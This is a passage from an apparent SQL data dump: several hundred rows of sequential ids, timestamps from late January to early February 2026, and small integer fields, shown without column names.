(25267, '2026-01-24 17:52:00', 1, 2061, 0, 1, 1),
(25268, '2026-01-24 18:02:30', 1, 2058, 0, 1, 1),
(25269, '2026-01-24 18:11:26', 1, 2055, 0, 1, 1),
(25270, '2026-01-24 18:34:07', 1, 2054, 0, 1, 1),
(25271, '2026-01-24 20:01:35', 1, 2064, 0, 1, 1),
(25272, '2026-01-24 20:22:19', 1, 2064, 0, 1, 1),
(25273, '2026-01-24 22:09:34', 1, 2061, 0, 1, 1),
(25274, '2026-01-24 23:10:34', 1, 2064, 0, 1, 1),
(25275, '2026-01-24 23:53:18', 1, 2059, 0, 1, 1),
(25276, '2026-01-24 23:53:30', 1, 2062, 0, 1, 1),
(25277, '2026-01-24 23:54:01', 1, 2061, 0, 1, 1),
(25278, '2026-01-24 23:54:10', 1, 2058, 0, 1, 1),
(25279, '2026-01-24 23:54:17', 1, 2063, 0, 1, 1),
(25280, '2026-01-25 01:51:54', 1, 2053, 0, 1, 1),
(25281, '2026-01-25 02:14:27', 1, 2062, 0, 1, 1),
(25282, '2026-01-25 02:24:03', 1, 2064, 0, 1, 1),
(25283, '2026-01-25 02:32:05', 1, 2059, 0, 1, 1),
(25284, '2026-01-25 02:39:48', 1, 2054, 0, 1, 1),
(25285, '2026-01-25 05:58:08', 1, 2059, 0, 1, 1),
(25286, '2026-01-25 07:14:17', 1, 2061, 0, 1, 1),
(25287, '2026-01-25 08:21:46', 1, 2062, 0, 1, 1),
(25288, '2026-01-25 08:48:27', 1, 2061, 0, 1, 1),
(25289, '2026-01-25 09:57:11', 1, 2064, 0, 1, 1),
(25290, '2026-01-25 11:00:53', 1, 2064, 0, 1, 1),
(25291, '2026-01-25 13:11:54', 1, 2064, 0, 1, 1),
(25292, '2026-01-25 13:42:13', 1, 2064, 0, 1, 1),
(25293, '2026-01-25 14:14:25', 1, 2054, 0, 1, 1),
(25294, '2026-01-25 15:35:18', 1, 2053, 0, 1, 1),
(25295, '2026-01-25 15:43:48', 1, 2058, 0, 1, 1),
(25296, '2026-01-25 16:22:49', 1, 2062, 0, 1, 1),
(25297, '2026-01-25 16:23:18', 1, 2062, 0, 1, 1),
(25298, '2026-01-25 16:43:26', 1, 2063, 0, 1, 1),
(25299, '2026-01-25 17:18:46', 1, 2061, 0, 1, 1),
(25300, '2026-01-25 17:54:23', 1, 2058, 0, 1, 1),
(25301, '2026-01-25 17:57:11', 1, 2061, 0, 1, 1),
(25302, '2026-01-25 18:53:16', 1, 2059, 0, 1, 1),
(25303, '2026-01-25 19:40:13', 1, 2064, 0, 1, 1),
(25304, '2026-01-25 20:01:36', 1, 2064, 0, 1, 1),
(25305, '2026-01-25 22:40:55', 1, 2058, 0, 1, 1),
(25306, '2026-01-26 00:40:37', 1, 2064, 0, 1, 1),
(25307, '2026-01-26 01:39:40', 1, 2054, 0, 1, 1),
(25308, '2026-01-26 02:49:26', 1, 2064, 0, 1, 1),
(25309, '2026-01-26 03:21:14', 1, 2054, 0, 1, 1),
(25310, '2026-01-26 04:32:53', 1, 2061, 0, 1, 1),
(25311, '2026-01-26 08:16:35', 1, 2061, 0, 1, 1),
(25312, '2026-01-26 09:42:43', 1, 2054, 0, 1, 1),
(25313, '2026-01-26 11:34:40', 1, 2054, 0, 1, 1),
(25314, '2026-01-26 11:36:11', 1, 2061, 0, 1, 1),
(25315, '2026-01-26 11:59:46', 1, 2054, 0, 1, 1),
(25316, '2026-01-26 11:59:53', 1, 2064, 0, 1, 1),
(25317, '2026-01-26 12:21:16', 1, 2061, 0, 1, 1),
(25318, '2026-01-26 14:50:47', 1, 2054, 0, 1, 1),
(25319, '2026-01-26 15:13:04', 1, 2061, 0, 1, 1),
(25320, '2026-01-26 16:18:01', 1, 2053, 0, 1, 1),
(25321, '2026-01-26 17:02:53', 1, 2062, 0, 1, 1),
(25322, '2026-01-26 17:03:17', 1, 2062, 0, 1, 1),
(25323, '2026-01-26 17:04:31', 1, 2064, 0, 1, 1),
(25324, '2026-01-26 17:08:07', 1, 2058, 0, 1, 1),
(25325, '2026-01-26 17:08:14', 1, 2061, 0, 1, 1),
(25326, '2026-01-26 17:08:53', 1, 2054, 0, 1, 1),
(25327, '2026-01-26 17:12:40', 1, 2059, 0, 1, 1),
(25328, '2026-01-26 17:25:53', 1, 2063, 0, 1, 1),
(25329, '2026-01-26 17:41:11', 1, 2062, 0, 1, 1),
(25330, '2026-01-26 17:54:17', 1, 2055, 0, 1, 1),
(25331, '2026-01-26 18:34:13', 1, 2053, 0, 1, 1),
(25332, '2026-01-26 19:32:04', 1, 2064, 0, 1, 1),
(25333, '2026-01-26 19:37:20', 1, 2060, 0, 1, 1),
(25334, '2026-01-26 19:55:30', 1, 2054, 0, 1, 1),
(25335, '2026-01-26 20:03:27', 1, 2058, 0, 1, 1),
(25336, '2026-01-26 21:51:51', 1, 2064, 0, 1, 1),
(25337, '2026-01-26 22:13:35', 1, 2054, 0, 1, 1),
(25338, '2026-01-26 22:56:06', 1, 2054, 0, 1, 1),
(25339, '2026-01-26 23:35:10', 1, 2063, 0, 1, 1),
(25340, '2026-01-26 23:35:16', 1, 2064, 0, 1, 1),
(25341, '2026-01-26 23:35:30', 1, 2062, 0, 1, 1),
(25342, '2026-01-26 23:36:05', 1, 2055, 0, 1, 1),
(25343, '2026-01-27 01:08:32', 1, 2059, 0, 1, 1),
(25344, '2026-01-27 01:08:36', 1, 2062, 0, 1, 1),
(25345, '2026-01-27 01:09:11', 1, 2061, 0, 1, 1),
(25346, '2026-01-27 01:09:18', 1, 2058, 0, 1, 1),
(25347, '2026-01-27 01:09:32', 1, 2063, 0, 1, 1),
(25348, '2026-01-27 01:16:17', 1, 2058, 0, 1, 1),
(25349, '2026-01-27 03:18:45', 1, 2060, 0, 1, 1),
(25350, '2026-01-27 03:18:48', 1, 2060, 0, 1, 1),
(25351, '2026-01-27 03:39:13', 1, 2054, 0, 1, 1),
(25352, '2026-01-27 04:08:22', 1, 2060, 0, 1, 1),
(25353, '2026-01-27 04:08:24', 1, 2060, 0, 1, 1),
(25354, '2026-01-27 05:20:29', 1, 2054, 0, 1, 1),
(25355, '2026-01-27 06:22:22', 1, 2064, 0, 1, 1),
(25356, '2026-01-27 07:15:21', 1, 2064, 0, 1, 1),
(25357, '2026-01-27 09:03:12', 1, 2061, 0, 1, 1),
(25358, '2026-01-27 09:07:31', 1, 2061, 0, 1, 1),
(25359, '2026-01-27 11:48:09', 1, 2064, 0, 1, 1),
(25360, '2026-01-27 14:02:24', 1, 2060, 0, 1, 1),
(25361, '2026-01-27 14:42:23', 1, 2054, 0, 1, 1),
(25362, '2026-01-27 15:35:01', 1, 2053, 0, 1, 1),
(25363, '2026-01-27 17:01:04', 1, 2062, 0, 1, 1),
(25364, '2026-01-27 17:01:31', 1, 2062, 0, 1, 1),
(25365, '2026-01-27 17:51:43', 1, 2064, 0, 1, 1),
(25366, '2026-01-27 17:51:56', 1, 2064, 0, 1, 1),
(25367, '2026-01-27 19:15:02', 1, 2054, 0, 1, 1),
(25368, '2026-01-27 22:06:18', 1, 2064, 0, 1, 1),
(25369, '2026-01-27 23:39:57', 1, 2061, 0, 1, 1),
(25370, '2026-01-28 00:28:51', 1, 2061, 0, 1, 1),
(25371, '2026-01-28 03:25:40', 1, 2064, 0, 1, 1),
(25372, '2026-01-28 03:31:36', 1, 2054, 0, 1, 1),
(25373, '2026-01-28 05:07:14', 1, 2063, 0, 1, 1),
(25374, '2026-01-28 05:18:43', 1, 2064, 0, 1, 1),
(25375, '2026-01-28 05:35:17', 1, 2064, 0, 1, 1),
(25376, '2026-01-28 05:36:59', 1, 2061, 0, 1, 1),
(25377, '2026-01-28 11:42:41', 1, 2064, 0, 1, 1),
(25378, '2026-01-28 12:02:57', 1, 2055, 0, 1, 1),
(25379, '2026-01-28 12:47:55', 1, 2060, 0, 1, 1),
(25380, '2026-01-28 13:01:28', 1, 2059, 0, 1, 1),
(25381, '2026-01-28 14:35:32', 1, 2054, 0, 1, 1),
(25382, '2026-01-28 15:02:27', 1, 2055, 0, 1, 1),
(25383, '2026-01-28 16:13:20', 1, 2054, 0, 1, 1),
(25384, '2026-01-28 16:38:31', 1, 2061, 0, 1, 1),
(25385, '2026-01-28 17:01:31', 1, 2062, 0, 1, 1),
(25386, '2026-01-28 17:01:56', 1, 2062, 0, 1, 1),
(25387, '2026-01-28 17:28:35', 1, 2060, 0, 1, 1),
(25388, '2026-01-28 17:30:48', 1, 2064, 0, 1, 1),
(25389, '2026-01-28 17:31:05', 1, 2064, 0, 1, 1),
(25390, '2026-01-28 17:56:11', 1, 2059, 0, 1, 1),
(25391, '2026-01-28 18:08:08', 1, 2059, 0, 1, 1),
(25392, '2026-01-28 19:20:30', 1, 2054, 0, 1, 1),
(25393, '2026-01-28 20:47:17', 1, 2053, 0, 1, 1),
(25394, '2026-01-28 21:09:52', 1, 2061, 0, 1, 1),
(25395, '2026-01-28 22:01:13', 1, 2059, 0, 1, 1),
(25396, '2026-01-28 23:13:53', 1, 2061, 0, 1, 1),
(25397, '2026-01-28 23:17:36', 1, 2064, 0, 1, 1),
(25398, '2026-01-29 02:16:29', 1, 2064, 0, 1, 1),
(25399, '2026-01-29 03:08:20', 1, 2063, 0, 1, 1),
(25400, '2026-01-29 03:12:00', 1, 2064, 0, 1, 1),
(25401, '2026-01-29 03:12:15', 1, 2062, 0, 1, 1),
(25402, '2026-01-29 03:12:28', 1, 2055, 0, 1, 1),
(25403, '2026-01-29 04:21:14', 1, 2064, 0, 1, 1),
(25404, '2026-01-29 05:50:14', 1, 2064, 0, 1, 1),
(25405, '2026-01-29 09:51:55', 1, 2059, 0, 1, 1),
(25406, '2026-01-29 10:06:59', 1, 2064, 0, 1, 1),
(25407, '2026-01-29 10:45:07', 1, 2062, 0, 1, 1),
(25408, '2026-01-29 10:45:13', 1, 2063, 0, 1, 1),
(25409, '2026-01-29 10:45:18', 1, 2062, 0, 1, 1),
(25410, '2026-01-29 10:58:55', 1, 2061, 0, 1, 1),
(25411, '2026-01-29 12:19:55', 1, 2054, 0, 1, 1),
(25412, '2026-01-29 12:37:59', 1, 2055, 0, 1, 1),
(25413, '2026-01-29 12:40:39', 1, 2064, 0, 1, 1),
(25414, '2026-01-29 12:50:22', 1, 2060, 0, 1, 1),
(25415, '2026-01-29 12:50:25', 1, 2060, 0, 1, 1),
(25416, '2026-01-29 13:00:31', 1, 2061, 0, 1, 1),
(25417, '2026-01-29 13:01:26', 1, 2062, 0, 1, 1),
(25418, '2026-01-29 13:01:31', 1, 2061, 0, 1, 1),
(25419, '2026-01-29 13:01:59', 1, 2058, 0, 1, 1),
(25420, '2026-01-29 13:02:01', 1, 2063, 0, 1, 1),
(25421, '2026-01-29 13:19:49', 1, 2053, 0, 1, 1),
(25422, '2026-01-29 13:34:45', 1, 2064, 0, 1, 1),
(25423, '2026-01-29 13:34:56', 1, 2064, 0, 1, 1),
(25424, '2026-01-29 13:36:55', 1, 2059, 0, 1, 1),
(25425, '2026-01-29 13:51:02', 1, 2060, 0, 1, 1),
(25426, '2026-01-29 13:51:05', 1, 2060, 0, 1, 1),
(25427, '2026-01-29 14:48:19', 1, 2055, 0, 1, 1),
(25428, '2026-01-29 14:48:21', 1, 2064, 0, 1, 1),
(25429, '2026-01-29 14:48:24', 1, 2061, 0, 1, 1),
(25430, '2026-01-29 14:48:27', 1, 2058, 0, 1, 1),
(25431, '2026-01-29 15:07:03', 1, 2064, 0, 1, 1),
(25432, '2026-01-29 15:35:16', 1, 2053, 0, 1, 1),
(25433, '2026-01-29 15:38:59', 1, 2061, 0, 1, 1),
(25434, '2026-01-29 16:29:23', 1, 2061, 0, 1, 1),
(25435, '2026-01-29 17:10:26', 1, 2062, 0, 1, 1),
(25436, '2026-01-29 17:10:48', 1, 2062, 0, 1, 1),
(25437, '2026-01-29 20:22:17', 1, 2063, 0, 1, 1),
(25438, '2026-01-29 21:22:44', 1, 2064, 0, 1, 1),
(25439, '2026-01-29 21:30:31', 1, 2054, 0, 1, 1),
(25440, '2026-01-29 22:11:14', 1, 2061, 0, 1, 1),
(25441, '2026-01-29 23:25:08', 1, 2061, 0, 1, 1),
(25442, '2026-01-29 23:41:49', 1, 2063, 0, 1, 1),
(25443, '2026-01-29 23:41:52', 1, 2062, 0, 1, 1),
(25444, '2026-01-29 23:41:59', 1, 2061, 0, 1, 1),
(25445, '2026-01-30 00:00:23', 1, 2064, 0, 1, 1),
(25446, '2026-01-30 01:54:22', 1, 2061, 0, 1, 1),
(25447, '2026-01-30 01:54:59', 1, 2054, 0, 1, 1),
(25448, '2026-01-30 02:04:57', 1, 2054, 0, 1, 1),
(25449, '2026-01-30 02:12:58', 1, 2062, 0, 1, 1),
(25450, '2026-01-30 02:25:05', 1, 2063, 0, 1, 1),
(25451, '2026-01-30 04:01:35', 1, 2058, 0, 1, 1),
(25452, '2026-01-30 04:54:44', 1, 2063, 0, 1, 1),
(25453, '2026-01-30 04:54:49', 1, 2063, 0, 1, 1),
(25454, '2026-01-30 04:55:55', 1, 2064, 0, 1, 1),
(25455, '2026-01-30 05:06:10', 1, 2064, 0, 1, 1),
(25456, '2026-01-30 05:06:11', 1, 2064, 0, 1, 1),
(25457, '2026-01-30 05:06:11', 1, 2063, 0, 1, 1),
(25458, '2026-01-30 05:06:11', 1, 2064, 0, 1, 1),
(25459, '2026-01-30 05:06:12', 1, 2062, 0, 1, 1),
(25460, '2026-01-30 05:06:12', 1, 2061, 0, 1, 1),
(25461, '2026-01-30 05:06:13', 1, 2060, 0, 1, 1),
(25462, '2026-01-30 05:06:14', 1, 2064, 0, 1, 1),
(25463, '2026-01-30 05:06:14', 1, 2058, 0, 1, 1),
(25464, '2026-01-30 05:06:14', 1, 2055, 0, 1, 1),
(25465, '2026-01-30 05:06:14', 1, 2059, 0, 1, 1),
(25466, '2026-01-30 05:06:14', 1, 2062, 0, 1, 1),
(25467, '2026-01-30 05:06:14', 1, 2061, 0, 1, 1),
(25468, '2026-01-30 05:06:15', 1, 2064, 0, 1, 1),
(25469, '2026-01-30 05:06:15', 1, 2060, 0, 1, 1),
(25470, '2026-01-30 05:06:16', 1, 2064, 0, 1, 1),
(25471, '2026-01-30 05:06:16', 1, 2058, 0, 1, 1),
(25472, '2026-01-30 05:06:16', 1, 2059, 0, 1, 1),
(25473, '2026-01-30 05:06:16', 1, 2064, 0, 1, 1),
(25474, '2026-01-30 05:06:16', 1, 2062, 0, 1, 1),
(25475, '2026-01-30 05:06:17', 1, 2060, 0, 1, 1),
(25476, '2026-01-30 05:06:17', 1, 2061, 0, 1, 1),
(25477, '2026-01-30 05:06:17', 1, 2055, 0, 1, 1),
(25478, '2026-01-30 05:06:18', 1, 2058, 0, 1, 1),
(25479, '2026-01-30 05:06:18', 1, 2054, 0, 1, 1),
(25480, '2026-01-30 05:06:18', 1, 2059, 0, 1, 1),
(25481, '2026-01-30 05:06:19', 1, 2064, 0, 1, 1),
(25482, '2026-01-30 05:06:19', 1, 2064, 0, 1, 1),
(25483, '2026-01-30 05:06:19', 1, 2055, 0, 1, 1),
(25484, '2026-01-30 05:06:20', 1, 2064, 0, 1, 1),
(25485, '2026-01-30 05:06:21', 1, 2064, 0, 1, 1),
(25486, '2026-01-30 05:08:20', 1, 2064, 0, 1, 1),
(25487, '2026-01-30 05:08:20', 1, 2064, 0, 1, 1),
(25488, '2026-01-30 05:08:20', 1, 2061, 0, 1, 1),
(25489, '2026-01-30 05:08:20', 1, 2064, 0, 1, 1),
(25490, '2026-01-30 05:08:20', 1, 2062, 0, 1, 1),
(25491, '2026-01-30 05:08:20', 1, 2063, 0, 1, 1),
(25492, '2026-01-30 05:08:21', 1, 2059, 0, 1, 1),
(25493, '2026-01-30 05:08:21', 1, 2058, 0, 1, 1),
(25494, '2026-01-30 05:08:21', 1, 2060, 0, 1, 1),
(25495, '2026-01-30 05:08:22', 1, 2055, 0, 1, 1),
(25496, '2026-01-30 05:08:22', 1, 2054, 0, 1, 1),
(25497, '2026-01-30 06:21:30', 1, 2060, 0, 1, 1),
(25498, '2026-01-30 06:21:47', 1, 2054, 0, 1, 1),
(25499, '2026-01-30 06:22:40', 1, 2058, 0, 1, 1),
(25500, '2026-01-30 06:22:50', 1, 2063, 0, 1, 1),
(25501, '2026-01-30 08:55:47', 1, 2062, 0, 1, 1),
(25502, '2026-01-30 09:50:50', 1, 2059, 0, 1, 1),
(25503, '2026-01-30 10:09:07', 1, 2053, 0, 1, 1),
(25504, '2026-01-30 10:11:11', 1, 2058, 0, 1, 1),
(25505, '2026-01-30 11:25:41', 1, 2054, 0, 1, 1),
(25506, '2026-01-30 12:04:33', 1, 2064, 0, 1, 1),
(25507, '2026-01-30 12:13:01', 1, 2061, 0, 1, 1),
(25508, '2026-01-30 12:22:43', 1, 2055, 0, 1, 1),
(25509, '2026-01-30 14:01:47', 1, 2060, 0, 1, 1),
(25510, '2026-01-30 14:01:50', 1, 2060, 0, 1, 1),
(25511, '2026-01-30 15:27:52', 1, 2061, 0, 1, 1),
(25512, '2026-01-30 17:31:28', 1, 2062, 0, 1, 1),
(25513, '2026-01-30 17:31:59', 1, 2062, 0, 1, 1),
(25514, '2026-01-30 18:04:48', 1, 2064, 0, 1, 1),
(25515, '2026-01-30 18:04:53', 1, 2064, 0, 1, 1),
(25516, '2026-01-30 18:10:37', 1, 2054, 0, 1, 1),
(25517, '2026-01-30 20:01:54', 1, 2064, 0, 1, 1),
(25518, '2026-01-30 20:29:05', 1, 2064, 0, 1, 1),
(25519, '2026-01-30 20:29:16', 1, 2064, 0, 1, 1),
(25520, '2026-01-30 20:29:22', 1, 2064, 0, 1, 1),
(25521, '2026-01-30 20:29:23', 1, 2059, 0, 1, 1),
(25522, '2026-01-30 20:29:23', 1, 2058, 0, 1, 1),
(25523, '2026-01-30 20:29:23', 1, 2061, 0, 1, 1),
(25524, '2026-01-30 20:29:23', 1, 2063, 0, 1, 1),
(25525, '2026-01-30 20:29:23', 1, 2064, 0, 1, 1),
(25526, '2026-01-30 20:29:23', 1, 2062, 0, 1, 1),
(25527, '2026-01-30 20:29:55', 1, 2060, 0, 1, 1),
(25528, '2026-01-30 20:30:05', 1, 2064, 0, 1, 1),
(25529, '2026-01-30 20:30:06', 1, 2060, 0, 1, 1),
(25530, '2026-01-30 20:30:07', 1, 2053, 0, 1, 1),
(25531, '2026-01-30 20:30:08', 1, 2054, 0, 1, 1),
(25532, '2026-01-30 20:30:09', 1, 2055, 0, 1, 1),
(25533, '2026-01-30 20:30:14', 1, 2054, 0, 1, 1),
(25534, '2026-01-30 20:30:16', 1, 2053, 0, 1, 1),
(25535, '2026-01-30 20:30:17', 1, 2053, 0, 1, 1),
(25536, '2026-01-30 20:30:17', 1, 2055, 0, 1, 1),
(25537, '2026-01-30 21:46:04', 1, 2064, 0, 1, 1),
(25538, '2026-01-30 21:47:12', 1, 2054, 0, 1, 1),
(25539, '2026-01-30 21:56:16', 1, 2063, 0, 1, 1),
(25540, '2026-01-30 23:35:25', 1, 2061, 0, 1, 1),
(25541, '2026-01-31 00:08:07', 1, 2054, 0, 1, 1),
(25542, '2026-01-31 00:08:11', 1, 2064, 0, 1, 1),
(25543, '2026-01-31 01:16:05', 1, 2064, 0, 1, 1),
(25544, '2026-01-31 01:16:09', 1, 2062, 0, 1, 1),
(25545, '2026-01-31 01:16:10', 1, 2064, 0, 1, 1),
(25546, '2026-01-31 01:16:11', 1, 2061, 0, 1, 1),
(25547, '2026-01-31 01:16:12', 1, 2059, 0, 1, 1),
(25548, '2026-01-31 01:16:13', 1, 2058, 0, 1, 1),
(25549, '2026-01-31 01:16:14', 1, 2064, 0, 1, 1),
(25550, '2026-01-31 01:16:15', 1, 2063, 0, 1, 1),
(25551, '2026-01-31 01:16:40', 1, 2060, 0, 1, 1),
(25552, '2026-01-31 01:16:49', 1, 2053, 0, 1, 1),
(25553, '2026-01-31 01:16:51', 1, 2055, 0, 1, 1),
(25554, '2026-01-31 01:16:52', 1, 2060, 0, 1, 1),
(25555, '2026-01-31 01:16:53', 1, 2064, 0, 1, 1),
(25556, '2026-01-31 01:16:54', 1, 2054, 0, 1, 1),
(25557, '2026-01-31 01:16:59', 1, 2054, 0, 1, 1),
(25558, '2026-01-31 01:17:01', 1, 2055, 0, 1, 1),
(25559, '2026-01-31 01:23:07', 1, 2063, 0, 1, 1),
(25560, '2026-01-31 03:20:06', 1, 2064, 0, 1, 1),
(25561, '2026-01-31 04:41:13', 1, 2053, 0, 1, 1),
(25562, '2026-01-31 05:11:05', 1, 2054, 0, 1, 1),
(25563, '2026-01-31 05:45:24', 1, 2064, 0, 1, 1),
(25564, '2026-01-31 07:08:47', 1, 2059, 0, 1, 1),
(25565, '2026-01-31 07:09:02', 1, 2060, 0, 1, 1),
(25566, '2026-01-31 08:30:29', 1, 2061, 0, 1, 1),
(25567, '2026-01-31 08:56:35', 1, 2061, 0, 1, 1),
(25568, '2026-01-31 09:14:42', 1, 2061, 0, 1, 1),
(25569, '2026-01-31 09:14:43', 1, 2061, 0, 1, 1),
(25570, '2026-01-31 09:19:24', 1, 2064, 0, 1, 1),
(25571, '2026-01-31 09:22:08', 1, 2061, 0, 1, 1),
(25572, '2026-01-31 09:23:00', 1, 2061, 0, 1, 1),
(25573, '2026-01-31 09:33:15', 1, 2061, 0, 1, 1),
(25574, '2026-01-31 11:05:02', 1, 2063, 0, 1, 1),
(25575, '2026-01-31 11:05:13', 1, 2064, 0, 1, 1),
(25576, '2026-01-31 11:05:16', 1, 2062, 0, 1, 1),
(25577, '2026-01-31 11:05:19', 1, 2055, 0, 1, 1),
(25578, '2026-01-31 11:28:03', 1, 2054, 0, 1, 1),
(25579, '2026-01-31 11:46:26', 1, 2059, 0, 1, 1),
(25580, '2026-01-31 12:03:17', 1, 2061, 0, 1, 1),
(25581, '2026-01-31 14:38:51', 1, 2061, 0, 1, 1),
(25582, '2026-01-31 15:35:14', 1, 2053, 0, 1, 1),
(25583, '2026-01-31 15:37:15', 1, 2064, 0, 1, 1),
(25584, '2026-01-31 16:40:34', 1, 2064, 0, 1, 1),
(25585, '2026-01-31 16:47:24', 1, 2062, 0, 1, 1),
(25586, '2026-01-31 16:48:02', 1, 2061, 0, 1, 1),
(25587, '2026-01-31 16:48:33', 1, 2058, 0, 1, 1),
(25588, '2026-01-31 16:50:13', 1, 2063, 0, 1, 1),
(25589, '2026-01-31 17:27:35', 1, 2062, 0, 1, 1),
(25590, '2026-01-31 18:01:26', 1, 2062, 0, 1, 1),
(25591, '2026-01-31 18:01:49', 1, 2062, 0, 1, 1),
(25592, '2026-01-31 18:11:40', 1, 2061, 0, 1, 1),
(25593, '2026-01-31 18:27:58', 1, 2064, 0, 1, 1),
(25594, '2026-01-31 18:31:30', 1, 2054, 0, 1, 1),
(25595, '2026-01-31 18:48:09', 1, 2064, 0, 1, 1),
(25596, '2026-01-31 19:17:18', 1, 2059, 0, 1, 1),
(25597, '2026-01-31 19:50:12', 1, 2062, 0, 1, 1),
(25598, '2026-01-31 20:36:20', 1, 2062, 0, 1, 1),
(25599, '2026-01-31 21:46:50', 1, 2060, 0, 1, 1),
(25600, '2026-01-31 21:46:54', 1, 2060, 0, 1, 1),
(25601, '2026-01-31 22:06:11', 1, 2061, 0, 1, 1),
(25602, '2026-01-31 22:48:19', 1, 2054, 0, 1, 1),
(25603, '2026-01-31 23:25:11', 1, 2062, 0, 1, 1),
(25604, '2026-02-01 00:08:18', 1, 2064, 0, 1, 1),
(25605, '2026-02-01 00:08:19', 1, 2064, 0, 1, 1),
(25606, '2026-02-01 00:08:19', 1, 2064, 0, 1, 1),
(25607, '2026-02-01 00:08:19', 1, 2062, 0, 1, 1),
(25608, '2026-02-01 00:08:19', 1, 2063, 0, 1, 1),
(25609, '2026-02-01 00:08:21', 1, 2061, 0, 1, 1),
(25610, '2026-02-01 00:08:21', 1, 2060, 0, 1, 1),
(25611, '2026-02-01 00:08:21', 1, 2064, 0, 1, 1),
(25612, '2026-02-01 00:08:21', 1, 2059, 0, 1, 1),
(25613, '2026-02-01 00:08:21', 1, 2064, 0, 1, 1),
(25614, '2026-02-01 00:08:21', 1, 2058, 0, 1, 1),
(25615, '2026-02-01 00:08:23', 1, 2064, 0, 1, 1),
(25616, '2026-02-01 00:08:23', 1, 2063, 0, 1, 1),
(25617, '2026-02-01 00:08:23', 1, 2061, 0, 1, 1),
(25618, '2026-02-01 00:08:24', 1, 2060, 0, 1, 1),
(25619, '2026-02-01 00:08:24', 1, 2064, 0, 1, 1),
(25620, '2026-02-01 00:08:24', 1, 2059, 0, 1, 1),
(25621, '2026-02-01 00:08:25', 1, 2064, 0, 1, 1),
(25622, '2026-02-01 00:08:25', 1, 2064, 0, 1, 1),
(25623, '2026-02-01 00:08:25', 1, 2063, 0, 1, 1),
(25624, '2026-02-01 00:08:26', 1, 2060, 0, 1, 1),
(25625, '2026-02-01 00:08:26', 1, 2058, 0, 1, 1),
(25626, '2026-02-01 00:08:26', 1, 2061, 0, 1, 1),
(25627, '2026-02-01 00:08:27', 1, 2059, 0, 1, 1),
(25628, '2026-02-01 00:08:28', 1, 2058, 0, 1, 1),
(25629, '2026-02-01 00:08:28', 1, 2064, 0, 1, 1),
(25630, '2026-02-01 00:08:28', 1, 2064, 0, 1, 1),
(25631, '2026-02-01 00:08:28', 1, 2055, 0, 1, 1),
(25632, '2026-02-01 00:08:28', 1, 2064, 0, 1, 1),
(25633, '2026-02-01 00:08:28', 1, 2061, 0, 1, 1),
(25634, '2026-02-01 00:08:28', 1, 2063, 0, 1, 1),
(25635, '2026-02-01 00:08:29', 1, 2060, 0, 1, 1),
(25636, '2026-02-01 00:08:29', 1, 2064, 0, 1, 1),
(25637, '2026-02-01 00:08:30', 1, 2059, 0, 1, 1),
(25638, '2026-02-01 00:08:30', 1, 2064, 0, 1, 1),
(25639, '2026-02-01 00:08:30', 1, 2064, 0, 1, 1),
(25640, '2026-02-01 00:08:30', 1, 2063, 0, 1, 1),
(25641, '2026-02-01 00:08:30', 1, 2061, 0, 1, 1),
(25642, '2026-02-01 00:08:30', 1, 2060, 0, 1, 1),
(25643, '2026-02-01 00:08:31', 1, 2058, 0, 1, 1),
(25644, '2026-02-01 00:08:31', 1, 2055, 0, 1, 1),
(25645, '2026-02-01 00:08:31', 1, 2059, 0, 1, 1),
(25646, '2026-02-01 00:08:32', 1, 2064, 0, 1, 1),
(25647, '2026-02-01 00:08:32', 1, 2064, 0, 1, 1),
(25648, '2026-02-01 00:08:32', 1, 2064, 0, 1, 1),
(25649, '2026-02-01 00:08:32', 1, 2058, 0, 1, 1),
(25650, '2026-02-01 00:08:32', 1, 2055, 0, 1, 1),
(25651, '2026-02-01 00:08:32', 1, 2061, 0, 1, 1),
(25652, '2026-02-01 00:08:33', 1, 2063, 0, 1, 1),
(25653, '2026-02-01 00:08:33', 1, 2060, 0, 1, 1),
(25654, '2026-02-01 00:08:34', 1, 2059, 0, 1, 1),
(25655, '2026-02-01 00:08:34', 1, 2054, 0, 1, 1),
(25656, '2026-02-01 00:08:34', 1, 2058, 0, 1, 1),
(25657, '2026-02-01 00:08:37', 1, 2054, 0, 1, 1),
(25658, '2026-02-01 00:08:38', 1, 2054, 0, 1, 1),
(25659, '2026-02-01 00:13:10', 1, 2061, 0, 1, 1),
(25660, '2026-02-01 02:13:11', 1, 2053, 0, 1, 1),
(25661, '2026-02-01 03:06:16', 1, 2061, 0, 1, 1),
(25662, '2026-02-01 03:15:46', 1, 2058, 0, 1, 1),
(25663, '2026-02-01 03:27:22', 1, 2055, 0, 1, 1),
(25664, '2026-02-01 03:34:30', 1, 2054, 0, 1, 1),
(25665, '2026-02-01 04:04:29', 1, 2061, 0, 1, 1),
(25666, '2026-02-01 05:42:52', 1, 2064, 0, 1, 1),
(25667, '2026-02-01 06:00:55', 1, 2058, 0, 1, 1),
(25668, '2026-02-01 06:57:44', 1, 2054, 0, 1, 1),
(25669, '2026-02-01 07:38:36', 1, 2061, 0, 1, 1),
(25670, '2026-02-01 08:07:52', 1, 2061, 0, 1, 1),
(25671, '2026-02-01 10:05:43', 1, 2061, 0, 1, 1),
(25672, '2026-02-01 11:31:14', 1, 2054, 0, 1, 1),
(25673, '2026-02-01 12:05:59', 1, 2064, 0, 1, 1),
(25674, '2026-02-01 12:32:11', 1, 2064, 0, 1, 1),
(25675, '2026-02-01 13:23:18', 1, 2055, 0, 1, 1),
(25676, '2026-02-01 14:55:35', 1, 2054, 0, 1, 1),
(25677, '2026-02-01 15:45:16', 1, 2064, 0, 1, 1),
(25678, '2026-02-01 16:45:21', 1, 2062, 0, 1, 1),
(25679, '2026-02-01 16:45:37', 1, 2062, 0, 1, 1),
(25680, '2026-02-01 17:18:15', 1, 2054, 0, 1, 1),
(25681, '2026-02-01 17:23:18', 1, 2063, 0, 1, 1),
(25682, '2026-02-01 17:31:22', 1, 2061, 0, 1, 1),
(25683, '2026-02-01 19:04:31', 1, 2054, 0, 1, 1),
(25684, '2026-02-01 19:09:20', 1, 2058, 0, 1, 1),
(25685, '2026-02-01 19:15:16', 1, 2060, 0, 1, 1),
(25686, '2026-02-01 19:18:07', 1, 2063, 0, 1, 1),
(25687, '2026-02-01 21:34:45', 1, 2058, 0, 1, 1),
(25688, '2026-02-02 01:20:33', 1, 2061, 0, 1, 1),
(25689, '2026-02-02 03:40:26', 1, 2064, 0, 1, 1),
(25690, '2026-02-02 04:07:39', 1, 2059, 0, 1, 1),
(25691, '2026-02-02 04:16:34', 1, 2058, 0, 1, 1),
(25692, '2026-02-02 05:08:21', 1, 2061, 0, 1, 1),
(25693, '2026-02-02 05:13:27', 1, 2054, 0, 1, 1),
(25694, '2026-02-02 05:20:31', 1, 2064, 0, 1, 1),
